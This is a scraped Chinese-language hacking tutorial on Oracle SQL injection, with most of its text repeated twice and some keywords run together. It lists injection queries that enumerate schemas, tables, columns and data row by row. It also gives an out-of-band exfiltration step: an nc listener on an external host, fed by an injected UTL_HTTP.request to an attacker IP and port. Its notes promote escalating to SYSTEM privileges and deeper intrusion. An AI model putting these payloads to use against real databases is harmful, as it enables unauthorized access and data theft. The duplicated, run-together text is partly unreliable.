<--IWMS_AD_END-->
and rownum=1
select owner from all_tables where owner<>"第一个库名"
and owner<>"第二个"and rownum=1
select owner from all_tables where owner<>"第一个库名"
and owner<>"第一个库名" and rownum=1
以此论推
爆表
select TABLE_NAME from all_tables where owner="库名"
and rownum=1
select TABLE_NAME from all_tables where owner="库名"
and rownum=1 and TABLE_NAME<>"表名1"
select TABLE_NAME from all_tables where owner="库名"andrownum=1
and TABLE_NAME<>"表名1" and TABLE_NAME<>"表名2"
以此论推
爆列
select COLUMN_NAME from user_tab_columns wheretable_name="表名"
and rownum=1
select COLUMN_NAME from user_tab_columns wheretable_name="表名"
and rownum=1 and COLUMN_NAME<>"第一个爆出的列名"
select COLUMN_NAME from user_tab_columns wheretable_name="表名"
and rownum=1 and COLUMN_NAME<>"第一个爆出的列名"andCOLUMN_NAME<>"第二个爆出的列名"
爆内容
第一个内容:select 列名 from 表名 where rownum=1
第二个内容:select 列名 from 表名 where rownum=1 and 列名<>"第一个值"
第三个内容:select 列名 from 表名 where rownum=1 and 列名<>"第一个值"and列名<>"第二个值"
以此论推
注
1:在windows环境下,oracle是以服务的形式启动的,这样通过web注射就可以直接获得system权限(此部分内容正在整理测试阶段中,以供给大家更直观、简洁、有效的参考资料
2:针对unix和linux操作系统方面对于Oracle也会作出分析,相信Oracle注射将会成为转入高级Hack入侵的桥梁。
Oracle认证开发技术:注射技术
首先外网nc监听对应的端口
and UTL_HTTP.request("外网ip:port/"(sql语句))=1--
爆库
select owner from all_tables where rownum=1
select owner from all_tables where owner<>"第一个库名"<--IWMS_AD_BEGIN-->
<--IWMS_AD_END-->
and rownum=1
select owner from all_tables where owner<>"第一个库名"
and owner<>"第二个"and rownum=1
select owner from all_tables where owner<>"第一个库名"
and owner<>"第一个库名" and rownum=1
以此论推
爆表
select TABLE_NAME from all_tables where owner="库名"
and rownum=1
select TABLE_NAME from all_tables where owner="库名"
and rownum=1 and TABLE_NAME<>"表名1"
select TABLE_NAME from all_tables where owner="库名"andrownum=1
and TABLE_NAME<>"表名1" and TABLE_NAME<>"表名2"
以此论推
爆列
select COLUMN_NAME from user_tab_columns wheretable_name="表名"
and rownum=1
select COLUMN_NAME from user_tab_columns wheretable_name="表名"
and rownum=1 and COLUMN_NAME<>"第一个爆出的列名"
select COLUMN_NAME from user_tab_columns wheretable_name="表名"
and rownum=1 and COLUMN_NAME<>"第一个爆出的列名"andCOLUMN_NAME<>"第二个爆出的列名"
爆内容
第一个内容:select 列名 from 表名 where rownum=1
第二个内容:select 列名 from 表名 where rownum=1 and 列名<>"第一个值"
第三个内容:select 列名 from 表名 where rownum=1 and 列名<>"第一个值"and列名<>"第二个值"
以此论推
注
1:在windows环境下,oracle是以服务的形式启动的,这样通过web注射就可以直接获得system权限(此部分内容正在整理测试阶段中,以供给大家更直观、简洁、有效的参考资料
2:针对unix和linux操作系统方面对于Oracle也会作出分析,相信Oracle注射将会成为转入高级Hack入侵的桥梁。